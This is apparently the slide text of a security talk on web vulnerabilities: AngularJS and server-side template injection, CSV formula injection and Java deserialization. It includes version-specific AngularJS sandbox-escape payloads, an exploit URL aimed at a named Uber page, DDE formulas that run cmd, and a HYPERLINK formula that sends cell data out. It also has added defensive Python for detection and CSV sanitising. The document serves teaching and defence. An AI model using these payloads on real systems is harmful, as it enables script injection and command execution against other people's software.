Some new vulnerabilities in modern web application (Part 1)
hkln1 (@anh_npt)
Thanks to the sponsors
AngularJS Template Injection (Client-side template injection)
What is AngularJS?
• Popular MVC JavaScript Framework
• Maintained and recommended by Google
• Read more: https://docs.angularjs.org/tutorial
What's the risk? (1)
Not vulnerable
What's the risk? (2)
???
Four general attack vectors
1. Attacking the Sandbox
2. Attacking the Sanitizer
3. Attacking the CSP Mode
4. Attacking the Codebase
The payloads…
• 1.0.1 - 1.1.5
• {{constructor.constructor('alert(1)')()}}
• 1.2.0 - 1.2.1
• {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
• ….
• 1.4.0 - 1.4.9
• {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
• 1.5.0-rc2 → Fixed
AngularJS injection in the wild (1)
• https://hackerone.com/reports/125027
AngularJS injection in the wild (2)
• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}
• Response: wrtz49 → Vulnerable
• Exploit: https://developer.uber.com/docs/deep-linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
Demo
• Piwik
Reference
• http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
• http://www.slideshare.net/x00mario/an-abusive-relationship-with-angularjs
Server-side template injection
What is a template engine? (1)
• Present dynamic data via web pages and emails.
• Separation of presentation (HTML/CSS) from application logic.
• Used in wikis, blogs, marketing applications and CMS.
• Some template engines:
• FreeMarker
• Velocity
• Smarty
• Twig
• Jade
What is a template engine? (2)
<?php echo $param ?>
<?php echo htmlspecialchars($var, ENT_QUOTES, 'UTF-8') ?>
{{ param }}
{{ param | escape }} / {{ param | e }}
What's the risk?
• Not only XSS → Remote Code Execution (RCE)
• Arbitrary object creation
• Arbitrary file read/write
• Remote file include
• Information disclosure and privilege escalation
Introduction (1)
• $output = $twig->render("Dear {first_name},", array("first_name" => $user->first_name)); → Not vulnerable
• $output = $twig->render($_GET['custom_email'], array("first_name" => $user->first_name)); → ???
Introduction (2)
• custom_email={{7*7}} → 49
• custom_email={{self}} → Object of class __TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
Template injection methodology
Detect (1)
• Plaintext context
smarty=Hello {user.name}      → Hello user1
freemarker=Hello ${username}  → Hello user1
any=<b> Hello </b>            → <b> Hello </b>
smarty=Hello ${7*7}           → Hello 49
freemarker=Hello ${7*7}       → Hello 49
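The two render() calls from the Introduction and the 7*7 probe from Detect (1), reproduced as an added Python example that is not from the slides or from Twig/Jinja2: a constructed stand-in template engine, a greeting rendered the unsafe and the safe way, and a local check a developer can run against their own render code. The names render, greeting_unsafe, greeting_safe and input_is_evaluated are assumptions made for this example.

```python
import ast
import operator
import re

# Constructed stand-in for a template engine (not Twig or Jinja2): {{ x }} is either a
# context lookup or an integer arithmetic expression, enough to reproduce "{{7*7}} -> 49".
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def _eval(node):
    """Evaluate a tiny arithmetic AST; anything else is rejected."""
    if isinstance(node, ast.Constant) and isinstance(node.value, int):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_eval(node.left), _eval(node.right))
    raise ValueError("unsupported expression")


def render(template, context):
    """Replace each {{ ... }} with a context value or an evaluated expression.
    Substituted values are not re-scanned, which is what keeps the safe path safe."""
    def sub(match):
        expr = match.group(1).strip()
        if expr in context:
            return str(context[expr])
        return str(_eval(ast.parse(expr, mode="eval").body))
    return re.sub(r"\{\{(.*?)\}\}", sub, template)


def greeting_unsafe(custom_email, first_name):
    """Mirrors $twig->render($_GET['custom_email'], ...): the user input IS the template."""
    return render(custom_email, {"first_name": first_name})


def greeting_safe(custom_text, first_name):
    """Fixed template; user text only enters through the context (as data, never code)."""
    return render("{{ text }} {{ first_name }},", {"text": custom_text, "first_name": first_name})


PROBE = "{{7*7}}"  # the plaintext-context probe from the Detect (1) slide


def input_is_evaluated(render_fn):
    """Local regression check: is a user-controlled field parsed as template code?
    True means the 7*7 probe came back as 49 instead of being shown literally."""
    out = render_fn(PROBE, "user1")
    return "49" in out and PROBE not in out
```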
Detect (2)
• Code context
Personal_greeting = username          → Hello user1
Personal_greeting = username<tag>     → Hello
Personal_greeting = username }} <tag> → Hello user01 <tag>
Identify
Exploit
• 'For Template Authors' - sections covering basic syntax.
• 'Security Considerations' - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints.
• Lists of builtin methods, functions, filters, and variables.
• Lists of extensions/plugins - some may be enabled by default.
Payloads: Smarty (1)
Payloads: Smarty (2)
Payloads: Smarty (3)
Payloads: Smarty (4)
Payloads: Twig
Payloads: Twig (Sandboxed)
Payloads: Jade
Payloads: FreeMarker
Server-side template injection in the wild
• https://hackerone.com/reports/125980
Demo
• Flask/Jinja2
• Alfresco
Reference
• http://blog.portswigger.net/2015/08/server-side-template-injection.html
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii
Formula Injection (CSV Injection)
What is CSV Injection?
• Exploited via export functionality that allows users to download CSV (Excel) files.
• Such exports often contain input from untrusted sources such as survey responses, transaction details and user-supplied addresses.
• The attacker can execute any commands on the user's machine if the web application does not properly validate the contents of the CSV file.
How to test?
• =1 + 1 → 2
• -2 + 3 → 1
• +3 + 5 → 8
The payloads…
• =HYPERLINK("https://example.com?test="&A1&A2,"Error: please click for further information")
• =DDE("cmd";"/C calc";"DdeLink_60_870516294")
• =cmd|' /C calc'!A0
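A defensive counterpart to the formula tests and payloads above, added here as an example that is not from the slides, from Magento or from OWASP: neutralizing formula-triggering cells when a web application exports CSV, plus a re-parse check for the export. The names sanitize_cell, export_csv, has_formula_cells and the SAMPLE_ROWS data are constructed for this example.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice treat a cell as a formula (the slides'
# =1+1, -2+3 and +3+5 tests), plus @ and the tab/CR variants spreadsheet apps also honour.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def sanitize_cell(value):
    """Neutralize a formula-looking cell by prefixing a single quote so it is shown as text.
    Some spreadsheet apps display that quote on CSV import; numeric columns are better
    exported as typed numbers than passed through this function."""
    text = str(value)
    if text.startswith(FORMULA_PREFIXES):
        return "'" + text
    return text


def export_csv(rows):
    """Write rows to CSV with every cell quoted and formula triggers neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


def has_formula_cells(csv_text):
    """Re-parse an export and report whether any cell still begins with a formula trigger;
    usable as a regression check on the real export code."""
    reader = csv.reader(io.StringIO(csv_text))
    return any(cell.startswith(FORMULA_PREFIXES) for row in reader for cell in row)


# Constructed sample export: survey responses, one carrying the DDE payload from the slides.
SAMPLE_ROWS = [
    ["user", "comment"],
    ["alice", "great service"],
    ["mallory", "=cmd|' /C calc'!A0"],
    ["bob", "-2 + 3"],
]
```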
CSV Injection in the wild
Demo
• Magento Community
Reference
• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection
• https://hackerone.com/reports/72785
• http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
Java deserialization vulnerability
What is serialization? (1)
What is serialization? (2)
More complex serialization… (1)
More complex serialization… (2)
Serialization in the context of Java web applications and application servers
• In HTTP requests – Parameters, ViewState, Cookies
• RMI – The extensively used Java RMI protocol
• RMI over HTTP – Many Java thick client web apps use this
• JMX
• Custom Protocols
What's the problem?
• What if we knew of an object that implemented a "readObject" method that did something dangerous?
• What if, instead of appending an exclamation point to a user-defined string, it did something else?
How to identify whether an application might be vulnerable?
Java deserialization vulnerability in the wild
• http://artsploit.blogspot.com/2016/01/paypal-rce.html
Analysis of exploiting the real cases – Jboss application (1)
1. Identify
Analysis of exploiting the real cases – Jboss application (2)
1. Exploit
Demo
Analysis of exploiting the real cases – Jenkins application (1)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (2)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (3)
1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (4)
2. Exploit Development
Analysis of exploiting the real cases – Jenkins application (5)
2. Exploit Development
Demo
Reference
• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
• http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
• https://www.youtube.com/watch?v=VviY3O-euVQ

Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application